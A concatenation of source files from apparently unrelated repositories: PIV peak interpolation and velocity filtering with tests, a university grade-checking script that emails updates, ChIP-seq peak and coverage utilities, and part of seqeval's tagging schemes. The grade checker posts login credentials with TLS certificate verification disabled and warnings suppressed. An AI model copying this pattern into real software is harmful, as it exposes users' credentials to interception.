/(2*np.log(x[2]) - 4*np.log(x[1]) + 2*np.log(x[0]))
return ip(window[:, 1]), ip(window[1])
def centroid(window):
"""Centroid interpolation for sub pixel shift"""
ip = lambda x : (x[2] - x[0])/(x[0] + x[1] + x[2])
return ip(window[:, 1]), ip(window[1])
def parabolic(window):
"""Parabolic interpolation for sub pixel shift"""
ip = lambda x : (x[0] - x[2])/(2*x[0] - 4*x[1] + 2*x[2])
return ip(window[:, 1]), ip(window[1])
def gaussian2D(window):
"""Real 2D Gaussian interpolation for sub pixel shift"""
#ref on paper
w = np.ones((3, 3))*(1./9)
rhs = np.zeros(6)
M = np.zeros((6,6))
for i in [-1, 0, 1]:
for j in [-1, 0, 1]:
rhs = rhs + np.array([i*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
j*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
i*j*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
i*i*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
j*j*w[i+1, j+1]*np.log(np.abs(window[i+1, j+1])),
w[i+1, j+1]*np.log(np.abs(window[i+1, j+1]))], dtype='float')
M = M + w[i+1, j+1]*np.array([[ i*i, i*j, i*i*j, i*i*i, i*j*j, i],
[ i*j, j*j, i*j*j, i*i*j, j*j*j, j],
[i*i*j, i*j*j, i*i*j*j, i*i*i*j, i*j*j*j, i*j],
[i*i*i, i*i*j, i*i*i*j, i*i*i*i, i*i*j*j, i*i],
[i*j*j, j*j*j, i*j*j*j, i*i*j*j, j*j*j*j, j*j],
[ i, j, i*j, i*i, j*j, 1]], dtype='float')
solution = nl.solve(M, rhs)
dx = ( solution[2]*solution[1] - 2.0*solution[0]*solution[4])/ \
(4.0*solution[3]*solution[4] - solution[2]*solution[2])
dy = ( solution[2]*solution[0] - 2.0*solution[1]*solution[3])/ \
(4.0*solution[3]*solution[4] - solution[2]*solution[2])
return dx, dy
```
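A minimal usage sketch for the peak detector above, assuming the module is importable as `pypiv.piv.peak_detection` (per the file path); the synthetic correlation surface and peak location are purely illustrative:
```python
import numpy as np
from pypiv.piv.peak_detection import find_peak
# Synthetic 64x64 correlation surface with a Gaussian peak at (row, col) = (20.7, 30.3).
y, x = np.mgrid[0:64, 0:64]
corr = np.exp(-((x - 30.3) ** 2 + (y - 20.7) ** 2) / 4.0)
i, j = find_peak(corr, method='gaussian')
print(i, j)  # close to (20.7, 30.3) thanks to the sub pixel interpolation
```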
#### File: pypiv/pypiv/velofilter.py
```python
import numpy as np
from scipy.stats import linregress as li
from math import exp
def calc_factor(field,stepsize=0.01):
"""
Function for calculation of the summed binning.
The returned result is an integral over the binning of the velocities.
It is done for the negative and positive half separately.
:param field: is a 1D field which will be binned
:param stepsize: is the step size for the velocity
:return (positive,negative):
velocities and the binning result for positive half and negative half are returned
as a tuple of numpy arrays
"""
result_pos = []
result_neg = []
alpha = 0.
#: binning of the positive half
while alpha <= np.max(field)+stepsize:
pos = alpha
neg = 0.
filtered = np.copy(field)
filtered[filtered<=neg] = np.nan
filtered[filtered>pos] = np.nan
outlier = np.count_nonzero(~np.isnan(filtered))/np.float(np.count_nonzero(~np.isnan(field)))
result_pos.append([alpha,outlier])
alpha += stepsize
alpha = 0.
#: binning of the negative half
while alpha <= np.abs(np.min(field))+stepsize:
pos = 0.
neg = -1.*alpha
filtered = np.copy(field)
filtered[filtered<=neg] = np.nan
filtered[filtered>pos] = np.nan
outlier = np.count_nonzero(~np.isnan(filtered))/np.float(np.count_nonzero(~np.isnan(field)))
result_neg.append([-1.*alpha,outlier])
alpha += stepsize
return (np.array(result_pos),np.array(result_neg))
def calc_derivative(field,stepsize=0.01):
"""
Function for calculation of the binning.
The returned result is the binning of the velocities.
It is called derivative because it is mathematically the derivative of the function:
.. function:: velofilter.calc_factor
It is done for the negative and positive half separately.
:param field: is a 1D field which will be binned
:param stepsize: is the step size for the velocity
:return (positive,negative):
velocities and the binning result for positive half and negative half are returned
as a tuple
"""
result_pos = []
result_neg = []
outlier = 1.
alpha = 0.
while alpha <= np.max(field)+stepsize:
pos = alpha+stepsize
neg = alpha
filtered = np.copy(field)
filtered[(filtered<=neg) | (filtered>pos)] = np.nan
#filtered[filtered>pos] = np.nan
outlier = np.count_nonzero(~np.isnan(filtered))/np.float(np.count_nonzero(~np.isnan(field)))
result_pos.append([alpha,outlier])
alpha += stepsize
outlier = 1.
alpha = 0.
while alpha <= np.abs(np.min(field))+stepsize:
pos = -1.*alpha
neg = -1.*(alpha+stepsize)
filtered = np.copy(field)
filtered[(filtered<=neg) | (filtered>pos)] = np.nan
#filtered[filtered>pos] = np.nan
outlier = np.count_nonzero(~np.isnan(filtered))/np.float(np.count_nonzero(~np.isnan(field)))
result_neg.append([-1.*alpha,outlier])
alpha += stepsize
return (np.array(result_pos),np.array(result_neg))
def filter(piv,tfactor=3.,dalpha=.01):
"""
Function for calculating the cutoff values.
:param object piv: PIV class object
This is supposed to be an object from a Direct or adaptive Class
it is needed to get the velocities
:param double tfactor: Factor for cutoff in the velocity binning
The default value is set to 3 which works for many cases
:param double dalpha: value for differential velocity
        The default is set to .01 which works for many cases;
        if the velocities vary over a larger range use a larger value
"""
#: pre sampling
numberup = np.count_nonzero(piv.u<=0.)/np.float(np.count_nonzero(piv.u))
numberun = np.count_nonzero(piv.u>0.)/np.float(np.count_nonzero(piv.u))
numbervp = np.count_nonzero(piv.v<=0.)/np.float(np.count_nonzero(piv.v))
numbervn = np.count_nonzero(piv.v>0.)/np.float(np.count_nonzero(piv.v))
upos = numberup
uneg = numberun
vpos = numbervp
vneg = numbervn
#: get alpha dependency
up_alpha, un_alpha = calc_factor(piv.u,dalpha)
vp_alpha, vn_alpha = calc_factor(piv.v,dalpha)
#: calculate derivative directly from data
dup_alpha1, dun_alpha1 = calc_derivative(piv.u,dalpha)
dvp_alpha1, dvn_alpha1 = calc_derivative(piv.v,dalpha)
dup_alpha = dup_alpha1[:,1]
dun_alpha = dun_alpha1[:,1]
dvp_alpha = dvp_alpha1[:,1]
dvn_alpha = dvn_alpha1[:,1]
#get boundaries
boundup = np.sum(dup_alpha[0:5])/5./np.exp(tfactor)
boundun = np.sum(dun_alpha[0:5])/5./np.exp(tfactor)
boundvp = np.sum(dvp_alpha[0:5])/5./np.exp(tfactor)
boundvn = np.sum(dvn_alpha[0:5])/5./np.exp(tfactor)
#get indices and exponential
if upos != 0.:
indexup = np.where(dup_alpha<boundup)
cut_up = np.int(np.sum(indexup[0][0:5])/5.)
nup = np.polyfit(np.log( up_alpha[1:cut_up,0]),np.log(up_alpha[1:cut_up,1]),1)
upos = exp(-nup[1]/nup[0])
if uneg != 0.:
indexun = np.where(dun_alpha<boundun)
cut_un = np.int(np.sum(indexun[0][0:5])/5.)
nun = np.polyfit(np.log(-un_alpha[1:cut_un,0]),np.log(un_alpha[1:cut_un,1]),1)
uneg = -exp(-nun[1]/nun[0])
if vpos != 0.:
indexvp = np.where(dvp_alpha<boundvp)
cut_vp = np.int(np.sum(indexvp[0][0:5])/5.)
nvp = np.polyfit(np.log( vp_alpha[1:cut_vp,0]),np.log(vp_alpha[1:cut_vp,1]),1)
vpos = exp(-nvp[1]/nvp[0])
if vneg != 0.:
indexvn = np.where(dvn_alpha<boundvn)
cut_vn = np.int(np.sum(indexvn[0][0:5])/5.)
nvn = np.polyfit(np.log(-vn_alpha[1:cut_vn,0]),np.log(vn_alpha[1:cut_vn,1]),1)
vneg = -exp(-nvn[1]/nvn[0])
#filter + clamping
if upos > np.max(piv.u):
upos = np.max(piv.u)
if uneg < np.min(piv.u):
uneg = np.min(piv.u)
if vpos > np.max(piv.v):
vpos = np.max(piv.v)
if vneg < np.min(piv.v):
vneg = np.min(piv.v)
#equalizing the cutoff
upos *= (0.5+numberup)
uneg *= (0.5+numberun)
vpos *= (0.5+numbervp)
vneg *= (0.5+numbervn)
#making the mask
masku = (piv.u<uneg) | (piv.u>upos)
maskv = (piv.v<vneg) | (piv.v>vpos)
piv.u[masku] = np.nan
piv.v[maskv] = np.nan
```
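A hedged usage sketch for `calc_factor` on a synthetic velocity field. The import path is assumed from the repository layout, and the module's use of the removed `np.float` alias means it needs NumPy older than 1.24 (or a small patch):
```python
import numpy as np
from pypiv import velofilter
rng = np.random.RandomState(0)
field = rng.normal(loc=1.0, scale=0.2, size=5000)
pos, neg = velofilter.calc_factor(field, stepsize=0.05)
# pos[:, 0] holds the velocity thresholds, pos[:, 1] the fraction of samples
# between 0 and each threshold; neg covers the negative half the same way.
print(pos[-1, 1])  # approaches 1.0 once the threshold exceeds max(field)
```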
#### File: pypiv/tests/test_fft_correlator.py
```python
import pytest
import os
import numpy as np
from pypiv import FFTCorrelator
@pytest.fixture(scope='module')
def data():
script_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(script_path, 'data/center_particle.npy')
window = np.load(file_path)
size = window.shape[0]
fft_corr = FFTCorrelator(window_a_size=size, window_b_size=size)
return (fft_corr, window)
def test_zero_displacement(data):
fft_corr, window = data
assert fft_corr.get_displacement(window, window) == (0, 0)
def test_zero_displacement_2D(data):
fft_corr, window = data
assert fft_corr.get_displacement(window, window,subpixel_method='9point') == (0, 0)
def test_x_displacement(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=0)
dx, dy = fft_corr.get_displacement(window_a, window_b)
assert abs(dx - 4) < 0.01
assert abs(dy) < 0.01
def test_x_displacement_2D(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=0)
dx, dy = fft_corr.get_displacement(window_a, window_b,subpixel_method='9point')
assert abs(dx - 4) < 0.01
assert abs(dy) < 0.01
def test_y_displacement(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b)
assert abs(dx) < 0.01
assert abs(dy - 4) < 0.01
def test_y_displacement_2D(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b,subpixel_method='9point')
assert abs(dx) < 0.01
assert abs(dy - 4) < 0.01
def test_xy_displacement(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=0)
window_b = np.roll(window_b, shift=4, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b)
assert abs(dx - 4) < 0.01
assert abs(dy - 4) < 0.01
def test_xy_displacement_2D(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=0)
window_b = np.roll(window_b, shift=4, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b,subpixel_method='9point')
assert abs(dx - 4) < 0.01
assert abs(dy - 4) < 0.01
def test_xy_displacement_subpixel(data):
fft_corr, window_a = data
window_b = np.load('data/shift05.npy')
#window_a = np.copy(window_b)
#window_b = np.roll(window_b, shift=1, axis=0)
#window_b = np.roll(window_b, shift=1, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b)
delta = .5
assert abs(dy - delta) < 0.01
assert abs(dx - delta) < 0.01
def test_xy_displacement_subpixel_2D(data):
fft_corr, window_a = data
window_b = np.load('data/shift05.npy')
#window_a = np.copy(window_b)
#window_b = np.roll(window_b, shift=1, axis=0)
#window_b = np.roll(window_b, shift=1, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b,subpixel_method='9point')
delta = .5
assert abs(dy - delta) < 0.01
assert abs(dx - delta) < 0.01
``` |
{
"source": "Jraaay/BUPT_scorechecker",
"score": 3
} |
#### File: Jraaay/BUPT_scorechecker/checkscore.py
```python
import base64
import sys
from bs4 import BeautifulSoup
import requests
import time
import json
import smtplib
from email.mime.text import MIMEText
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Variable settings
user_Account = '' # student ID for the new educational administration system
user_password = '' # password for the new educational administration system
recevie_email = '' # email address that will receive the notification, e.g. <EMAIL>
sender_email = '' # 163 mailbox address used to send the mail, e.g. <EMAIL>
sender_email_pass = '' # authorization code of the 163 mailbox
user_encode = str(base64.b64encode(bytes(user_Account, encoding='utf-8')), encoding='utf-8') + \
'%%%' + str(base64.b64encode(bytes(user_password,
encoding='utf-8')), encoding='utf-8')
try:
with open('score.json', encoding='utf-8') as f:
data = json.load(f)
except IOError:
data = {'totalscore': '-1', 'resultarr': []}
changed = False
errortimes = 0
def checkscore():
    # Log in to the educational administration system
url = 'https://jwgl.bupt.edu.cn/jsxsd/'
result = requests.get(url, verify=False)
cookies = result.cookies
url = 'https://jwgl.bupt.edu.cn/jsxsd/xk/LoginToXk'
form_data = {
'userAccount': user_Account,
'userPassword': '',
'encoded': user_encode
}
result = requests.post(url, cookies=cookies, data=form_data, verify=False)
url = 'https://jwgl.bupt.edu.cn/jsxsd/kscj/cjcx_list'
form_data = {'kksj': '', 'kcxz': '', 'kcmc': '', 'xsfs': 'all'}
resultraw = requests.post(url,
data=form_data, cookies=cookies, verify=False)
result = resultraw.text
keyword = '所修总学分:'
start = result.find(keyword)
keyword = '绩点:'
end = result.find(keyword)
remainscore = result[start + 6: end].strip()
soup = BeautifulSoup(result, features='html.parser')
try:
table = soup.select('#dataList')[0]
except:
print((time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
               'Failed to obtain results; there may be no grades yet or the cookies are invalid, please update!').encode(encoding='utf-8'))
sendemail('NULL', 'NULL', 'Please update the invalid cookies!', '')
sys.exit(0)
resultarr = []
allrows = table.select('tr')
for row in allrows:
allcols = row.select('td')
if (len(allcols) == 0):
continue
resultarr.append([])
for col in allcols:
resultarr[-1].append(col.text.strip())
return remainscore, resultarr
def sendemail(remainscore, oldscore, title, answerstr):
    # Information required by the mail server
    # 163 mail server address
mail_host = 'smtp.163.com'
    # 163 account username
mail_user = sender_email
    # password (for some mailboxes this is the authorization code)
mail_pass = sender_email_pass
    # sender email address
sender = sender_email
    # recipient email addresses; note they must be wrapped in [], which means you can list several addresses for a group send
receivers = [recevie_email]
    # Build the email message
    # message body
content = '新剩余学分为:' + remainscore + ',原剩余学分为:' + oldscore + answerstr
message = MIMEText(content, 'plain', 'utf-8')
    # subject line
message['Subject'] = title
    # sender information
message['From'] = sender
    # recipient information
message['To'] = receivers[0]
    # Log in and send the email
try:
smtpObj = smtplib.SMTP()
        # connect to the server
smtpObj.connect(mail_host, 25)
        # log in to the server
smtpObj.login(mail_user, mail_pass)
        # send
smtpObj.sendmail(
sender, receivers, message.as_string())
        # quit
smtpObj.quit()
global changed
print(time.strftime('%Y-%m-%d %H:%M:%S ',
time.localtime()) + 'Email has been sent!')
if (title == '程序出现异常!!!!!!'):
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
                  'There is something wrong!!! Stopping monitor!!!!')
changed = True
else:
changed = False
data['totalscore'] = remainscore
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
'Current score has been updated to ' + data['totalscore'] + '. Continue monitor.')
except smtplib.SMTPException as e:
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
              ' Email sending error', e) # print the error
while changed == False:
try:
remainscore, resultarr = checkscore()
if remainscore == data['totalscore']:
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
'Checked successfully, there is no change. Remain score is ' + remainscore + '.')
changed = False
else:
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
'Checked successfully, there are some change! Remain score is ' + remainscore + '! Old score is ' + data['totalscore'])
changed = True
score_dict = {
'totalscore': remainscore,
'resultarr': resultarr
}
with open('score.json', 'w', encoding='utf-8') as json_file:
json.dump(score_dict, json_file, ensure_ascii=False,
indent=4, separators=(',', ': '))
answerstr = '\r\n\r\n以下课程有增加:\r\n'
oldname = [x[3] for x in data['resultarr']]
newname = [x[3] for x in resultarr]
subject_changed = list(set(newname).difference(oldname))
for x in subject_changed:
for y in resultarr:
if (y[3] == x):
answerstr += y[3] + ': ' + y[5] + '\r\n'
if data['totalscore'] != '-1':
sendemail(remainscore, data['totalscore'], '成绩有更新', answerstr)
else:
changed = False
print('First run.')
data['totalscore'] = remainscore
data['resultarr'] = resultarr
time.sleep(10)
except Exception as e:
if errortimes < 2:
errortimes = errortimes + 1
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()), e)
print(time.strftime('%Y-%m-%d %H:%M:%S ',
time.localtime()) + 'Program is retrying...')
time.sleep(10)
else:
sendemail('', '', '程序出现异常!!!!!!', '')
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()), e)
``` |
{
"source": "jraab/raab_swisnf_2015",
"score": 2
} |
#### File: raab_swisnf_2015/code/call.calc_enrichment_at_peaks.py
```python
import subprocess
import os
import re
import time
import yaml
# wrapper script to repeatedly call my enrichment mapper
# The directories are not set up to be portable - but the only script this depends
# on is submitCoverageFrame.sh which calls coverageFrame.py
# These are provided in the utils/ directory
peakdir = '/magnuson-lab/jraab/analysis/swi_snf_final/output/macs_peaks/cleaned/'
def allEncodeOverPeaks(peaks, peakdir):
bamdir = '/magnuson-lab/jraab/ENCODE/datafiles/HepG2/combined/'
bams = [b for b in os.listdir(bamdir)if b.endswith('.bam') ]
out = '/magnuson-lab/jraab/analysis/swi_snf_final/output/encode_coverages/'
if not os.path.exists(out):
os.mkdir(out)
yf = open('/magnuson-lab/jraab/ENCODE/datafiles/HepG2/hepg2_input_index.yaml')
yobj = yaml.load(yf)
for input, p in yobj.iteritems():
for ip in p:
ip_f = bamdir+ip
print input, ip
input_f = bamdir+input
for s in peaks:
bamname = ip.split('.')[0].split('Hepg2')[1]
pname = s.split('_')[0]
print bamname, pname
qsub_cmd = 'qsub -V -v P='+peakdir+s+',B='+ip_f+',I='+input_f+',BNAME='+bamname+',O='+out+',PNAME='+pname+' submitCoverageFrame.sh'
print qsub_cmd.split()
subprocess.call(qsub_cmd.split(), shell=False)
time.sleep(3)
time.sleep(10)
yf = open('/magnuson-lab/jraab/ENCODE/datafiles/HepG2/haib.yml')
yobj = yaml.load(yf)
for input, p in yobj.iteritems():
for ip in p:
ip_f = bamdir+ip
print input, ip
input_f = bamdir+input
for s in peaks:
bamname = ip.split('.')[0].split('Hepg2')[1]
pname = s.split('_')[0]
print bamname, pname
qsub_cmd = 'qsub -V -v P='+peakdir+s+',B='+ip_f+',I='+input_f+',BNAME='+bamname+',O='+out+',PNAME='+pname+' submitCoverageFrame.sh'
print qsub_cmd.split()
subprocess.call(qsub_cmd.split(), shell=False)
time.sleep(3)
time.sleep(10)
# pass in a list of peak summits and the directory they came from
peakdir = '/magnuson-lab/jraab/analysis/swi_snf_final/output/macs_peaks/cleaned/'
summits = [ s for s in os.listdir(peakdir) if s.endswith('_cf.bed')]
print summits
#allEncodeOverPeaks(summits, peakdir)
multi_summit = [s for s in os.listdir(peakdir) if s.endswith('multi_bound_peaks.csv') ]
#allEncodeOverPeaks(multi_summit, peakdir)
# do the dnase separately
summits.append(multi_summit[0])
for peaks in summits:
bamdir = '/magnuson-lab/jraab/ENCODE/datafiles/HepG2/combined/'
out = '/magnuson-lab/jraab/analysis/swi_snf_final/output/encode_coverages/'
signal_file = 'wgEncodeOpenChromDnaseHepg2Aln.sorted.merged.bam'
bamname = 'DNase'
pname = peaks.split('_')[0]
ip_f = bamdir+signal_file
qsub_cmd = 'qsub -V -v P='+peakdir+peaks+',B='+ip_f+',I=NULL,BNAME='+bamname+',OUT='+out+',PNAME='+pname+' submitCoverageFrame.sh'
print qsub_cmd.split()
subprocess.call(qsub_cmd.split(), shell = False)
time.sleep(3)
```
#### File: code/chip_analysis/merge_and_filter_peaks.py
```python
import pybedtools as pbt
import os
import pandas as pd
directory = '/magnuson-lab/jraab/analysis/swi_snf_final/'
peakdir = directory + 'output/macs_peaks/'
patt = 'broadPeak'
blacklist = '/magnuson-lab/jraab/annotations/combinedblacklist.expanded.bed'
blacklist_bt = pbt.BedTool(blacklist)
def exclude_regions_by_bedtool(bt, filter):
""" take a bedtool and filter bedtool to exclude any intervals that overlap the blacklist """
if filter.any_hits(bt):
return(False)
else:
return(True)
files = [p for p in os.listdir(peakdir) if p.endswith(patt) ]
for f in files:
bt = pbt.BedTool(peakdir + f)
name = f.split('.')[0]
    bt = bt.merge(d=100)  # merge() returns a new BedTool; it is not in-place
bt_filtered = bt.filter(exclude_regions_by_bedtool, filter = blacklist_bt)
bt_filtered.saveas('/magnuson-lab/jraab/scratch/tmp.bed')
df = pd.read_table('/magnuson-lab/jraab/scratch/tmp.bed', names=['chrom', 'start', 'end', 'name', 'score', 'strand', 'x', 'y', 'z'] )
df = df.ix[:,0:6]
print df.head()
df['name'] = [name +'_'+ str(i) for i in range(df['name'].shape[0] ) ]
df.to_csv( peakdir + 'cleaned/' + name + '_cf.bed', index=False, header=False, sep='\t' )
```
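A small self-contained illustration of the blacklist-exclusion step used above, with in-memory BedTools standing in for the cluster-specific files (the interval coordinates are made up):
```python
import pybedtools as pbt
peaks = pbt.BedTool('chr1 100 200 p1\nchr1 500 600 p2', from_string=True)
blacklist = pbt.BedTool('chr1 150 180 bad', from_string=True)
# Keep only peaks with no blacklist overlap, mirroring exclude_regions_by_bedtool.
kept = peaks.filter(lambda iv: not blacklist.any_hits(iv)).saveas()
print(kept)  # only the second peak survives
```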
#### File: code/util/bamToWig_chip.py
```python
import argparse
import HTSeq
import numpy
import os
import sys
parser = argparse.ArgumentParser(description = 'Convert BAM files to wiggle tracks' )
parser.add_argument('-b', help='input bam' )
parser.add_argument('--norm', help = 'Normalize by read depth' , action='store_true')
parser.add_argument('-s', help = 'separate files for + and - strand', action='store_true', default=False)
parser.add_argument('-g', help = 'genome name e.g hg19')
parser.add_argument('-d', help = 'outputdirectory')
parser.add_argument('-frag', help = 'fragment size of library', default = 200)
args = parser.parse_args()
binsize = 30 # looks like ENCODE bins things at about 30 bases or so
home = 'magnuson-lab/jraab/'
################################
def calc_coverage(bamfile, chrom_dict, fragmentsize, stranded=False):
read_count =0
millions =1
bamfile = HTSeq.BAM_Reader(bamfile)
fragmentsize = fragmentsize #smooth out reads based on fragmentsizes
if stranded==True:
cvg = HTSeq.GenomicArray(chrom_dict, stranded=True, typecode='d', storage='step')
else:
cvg = HTSeq.GenomicArray(chrom_dict, stranded=False, typecode='d', storage='step')
for almnt in bamfile:
if almnt.aligned:
end_of_chrom = chrom_dict[almnt.iv.chrom]
almnt.iv.length = fragmentsize
if almnt.iv.start <1:
almnt.iv.start =1
if almnt.iv.end > end_of_chrom:
almnt.iv.end = end_of_chrom
cvg[almnt.iv]+=1
read_count += 1
if read_count % 1e6 == 0:
processed = int(1e6*millions)
print ' Processed %.1E reads' % processed
millions +=1
if args.norm:
normfactor = 1e6*binsize/read_count
for iv, val in cvg.steps():
cvg[iv].apply(lambda x: x* normfactor)
else:
cvg = cvg
return(cvg)
def read_genome(genome):
with open(genome) as g:
chrom_sizes=dict()
for l in g:
if l.startswith('chrom'):
                continue
else :
chrom_sizes[l.split('\t')[0]] = int(l.split('\t')[1])
return(chrom_sizes)
###############################
#this file must exist
if args.g == 'hg19':
genome = '/magnuson-lab/shared/jraab/genome_sizes/genome_hg19.txt'
chrom_sizes = read_genome(genome)
elif args.g =='mm9':
    genome = '/magnuson-lab/shared/jraab/genome_sizes/genome_mm9.txt'
chrom_sizes = read_genome(genome)
else:
sys.exit('Need to input a valid genome hg19 or mm9')
name = args.b.split('/')[-1]
name = name.split('.')[0]
#change this if you want output to go somewhere else
dir = args.d
if not os.path.exists(dir):
os.makedirs(dir)
filename=os.path.basename(args.b).split('.')[0]
if args.s == True:
#for RNAseq stranded protocol these will come out backwards.
    genome_cov = calc_coverage(args.b, chrom_sizes, stranded=True, fragmentsize=int(args.frag))
    genome_cov.write_bedgraph_file(dir+filename+'_plus.bg', strand='+')
    genome_cov.write_bedgraph_file(dir+filename+'_minus.bg', strand='-')
else:
genome_cov= calc_coverage(args.b, chrom_sizes, stranded=False, fragmentsize = int(args.frag))
genome_cov.write_bedgraph_file(dir+filename+'.bg')
``` |
{
"source": "jrabag/seqeval",
"score": 3
} |
#### File: seqeval/seqeval/scheme.py
```python
import enum
from itertools import chain
from typing import List, Set, Tuple, Type
class Entity:
def __init__(self, sent_id: int, start: int, end: int, tag: str):
self.sent_id = sent_id
self.start = start
self.end = end
self.tag = tag
def __repr__(self):
return '({}, {}, {}, {})'.format(self.sent_id, self.tag, self.start, self.end)
def __eq__(self, other: 'Entity'):
return self.to_tuple() == other.to_tuple()
def __hash__(self):
return hash(self.to_tuple())
def to_tuple(self):
return self.sent_id, self.tag, self.start, self.end
def match_start_offset(self, other: 'Entity'):
return self.start == other.start
def match_end_offset(self, other: 'Entity'):
return self.end == other.end
def match_partially(self, other: 'Entity'):
if self.match_start_offset(other) and not self.match_end_offset(other):
return True
if not self.match_start_offset(other) and self.match_end_offset(other):
return True
return False
class Prefix(enum.Flag):
I = enum.auto()
O = enum.auto()
B = enum.auto()
E = enum.auto()
S = enum.auto()
U = enum.auto()
L = enum.auto()
ANY = I | O | B | E | S | U | L
Prefixes = dict(Prefix.__members__)
class Tag(enum.Flag):
SAME = enum.auto()
DIFF = enum.auto()
ANY = SAME | DIFF
class Token:
allowed_prefix = None
start_patterns = None
inside_patterns = None
end_patterns = None
def __init__(self, token: str, suffix: bool = False, delimiter: str = '-'):
self.token = token
self.prefix = Prefixes[token[-1]] if suffix else Prefixes[token[0]]
tag = token[:-1] if suffix else token[1:]
self.tag = tag.strip(delimiter) or '_'
def __repr__(self):
return self.token
def is_valid(self):
"""Check whether the prefix is allowed or not."""
if self.prefix not in self.allowed_prefix:
allowed_prefixes = str(self.allowed_prefix).replace('Prefix.', '')
message = 'Invalid token is found: {}. Allowed prefixes are: {}.'
raise ValueError(message.format(self.token, allowed_prefixes))
return True
def is_start(self, prev: 'Token'):
"""Check whether the current token is the start of chunk."""
return self.check_patterns(prev, self.start_patterns)
def is_inside(self, prev: 'Token'):
"""Check whether the current token is inside of chunk."""
return self.check_patterns(prev, self.inside_patterns)
def is_end(self, prev: 'Token'):
"""Check whether the previous token is the end of chunk."""
return self.check_patterns(prev, self.end_patterns)
def check_tag(self, prev: 'Token', cond: Tag):
"""Check whether the tag pattern is matched."""
if cond == Tag.ANY:
return True
if prev.tag == self.tag and cond == Tag.SAME:
return True
if prev.tag != self.tag and cond == Tag.DIFF:
return True
return False
def check_patterns(self, prev: 'Token', patterns: Set[Tuple[Prefix, Prefix, Tag]]):
"""Check whether the prefix patterns are matched."""
for prev_prefix, current_prefix, tag_cond in patterns:
if prev.prefix in prev_prefix and self.prefix in current_prefix and self.check_tag(prev, tag_cond):
return True
return False
class IOB1(Token):
allowed_prefix = Prefix.I | Prefix.O | Prefix.B
start_patterns = {
(Prefix.O, Prefix.I, Tag.ANY),
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.B, Prefix.I, Tag.ANY),
(Prefix.I, Prefix.B, Tag.SAME),
(Prefix.B, Prefix.B, Tag.SAME)
}
inside_patterns = {
(Prefix.B, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME)
}
end_patterns = {
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.I, Prefix.O, Tag.ANY),
(Prefix.I, Prefix.B, Tag.ANY),
(Prefix.B, Prefix.O, Tag.ANY),
(Prefix.B, Prefix.I, Tag.DIFF),
(Prefix.B, Prefix.B, Tag.SAME)
}
class IOE1(Token):
# Todo: IOE1 hasn't yet been able to handle some cases. See unit testing.
allowed_prefix = Prefix.I | Prefix.O | Prefix.E
start_patterns = {
(Prefix.O, Prefix.I, Tag.ANY),
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.E, Prefix.I, Tag.ANY),
(Prefix.E, Prefix.E, Tag.SAME)
}
inside_patterns = {
(Prefix.I, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.E, Tag.SAME)
}
end_patterns = {
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.I, Prefix.O, Tag.ANY),
(Prefix.I, Prefix.E, Tag.DIFF),
(Prefix.E, Prefix.I, Tag.SAME),
(Prefix.E, Prefix.E, Tag.SAME)
}
class IOB2(Token):
allowed_prefix = Prefix.I | Prefix.O | Prefix.B
start_patterns = {
(Prefix.ANY, Prefix.B, Tag.ANY)
}
inside_patterns = {
(Prefix.B, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME)
}
end_patterns = {
(Prefix.I, Prefix.O, Tag.ANY),
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.I, Prefix.B, Tag.ANY),
(Prefix.B, Prefix.O, Tag.ANY),
(Prefix.B, Prefix.I, Tag.DIFF),
(Prefix.B, Prefix.B, Tag.ANY)
}
class IOE2(Token):
allowed_prefix = Prefix.I | Prefix.O | Prefix.E
start_patterns = {
(Prefix.O, Prefix.I, Tag.ANY),
(Prefix.O, Prefix.E, Tag.ANY),
(Prefix.E, Prefix.I, Tag.ANY),
(Prefix.E, Prefix.E, Tag.ANY),
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.I, Prefix.E, Tag.DIFF)
}
inside_patterns = {
(Prefix.I, Prefix.E, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME)
}
end_patterns = {
(Prefix.E, Prefix.ANY, Tag.ANY)
}
class IOBES(Token):
allowed_prefix = Prefix.I | Prefix.O | Prefix.B | Prefix.E | Prefix.S
start_patterns = {
(Prefix.ANY, Prefix.B, Tag.ANY),
(Prefix.ANY, Prefix.S, Tag.ANY)
}
inside_patterns = {
(Prefix.B, Prefix.I, Tag.SAME),
(Prefix.B, Prefix.E, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.E, Tag.SAME)
}
end_patterns = {
(Prefix.S, Prefix.ANY, Tag.ANY),
(Prefix.E, Prefix.ANY, Tag.ANY)
}
class BILOU(Token):
